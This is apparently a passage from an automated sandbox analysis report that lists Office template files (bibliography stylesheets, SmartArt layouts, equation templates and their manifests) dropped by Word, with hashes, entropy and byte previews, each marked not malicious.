                                                                                                                                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6883.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):278
                                                                                                                                              Entropy (8bit):3.5280239200222887
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                              SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                              SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                              SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6883.tmp\gb.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):268317
                                                                                                                                              Entropy (8bit):5.05419861997223
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                              MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                              SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                              SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                              SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6893.tmp\APASixthEditionOfficeOnline.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):333258
                                                                                                                                              Entropy (8bit):4.654450340871081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                              MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                              SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                              SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                              SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6893.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):328
                                                                                                                                              Entropy (8bit):3.541819892045459
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                              SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                              SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                              SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68B5.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):256
                                                                                                                                              Entropy (8bit):3.464918006641019
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                              MD5:93149E194021B37162FD86684ED22401
                                                                                                                                              SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                              SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                              SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68B5.tmp\Equations.dotx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):51826
                                                                                                                                              Entropy (8bit):5.541375256745271
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                              MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                              SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                              SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                              SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68C6.tmp\BracketList.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4026
                                                                                                                                              Entropy (8bit):7.809492693601857
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68C6.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):250
                                                                                                                                              Entropy (8bit):3.4916022431157345
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                              MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                              SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                              SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                              SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68E6.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):280
                                                                                                                                              Entropy (8bit):3.484503080761839
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                              MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                              SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                              SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                              SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68E6.tmp\InterconnectedBlockProcess.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9191
                                                                                                                                              Entropy (8bit):7.93263830735235
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68F7.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):256
                                                                                                                                              Entropy (8bit):3.4842773155694724
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                              MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                              SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                              SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                              SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD68F7.tmp\ConvergingText.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11380
                                                                                                                                              Entropy (8bit):7.891971054886943
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6908.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):254
                                                                                                                                              Entropy (8bit):3.4721586910685547
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                              MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                              SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                              SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                              SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6908.tmp\chevronaccent.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4243
                                                                                                                                              Entropy (8bit):7.824383764848892
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6918.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):3.5026803317779778
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                              SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                              SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                              SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6918.tmp\gosttitle.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):251032
                                                                                                                                              Entropy (8bit):5.102652100491927
                                                                                                                                              Encrypted:false
